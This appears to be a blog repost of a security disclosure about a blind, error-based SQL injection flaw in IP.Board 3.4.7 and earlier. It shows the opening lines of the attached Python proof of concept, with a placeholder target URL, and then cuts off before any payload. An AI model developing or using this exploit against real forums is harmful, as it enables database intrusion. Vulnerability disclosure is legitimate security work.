IP.Board <= 3.4.7 SQL Injection

November 8, 2014 007admin Leave a comment

Posted by secthrowaway on Nov 09

IP.Board version 3.4.7 (latest) suffers from a SQL injection vulnerability.

Working PoC is attached.
#!/usr/bin/env python
# Sunday, November 09, 2014 – secthrowaway () safe-mail net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if ‘cache/sql_error_latest.cgi’ is unreadable

url = ‘http://target.tld/forum/'
ua = “Mozilla/5.0 (Windows NT 6.2; WOW64)…

007 Software

IP.Board <= 3.4.7 SQL Injection

Leave a Reply Cancel reply

Software and Security Information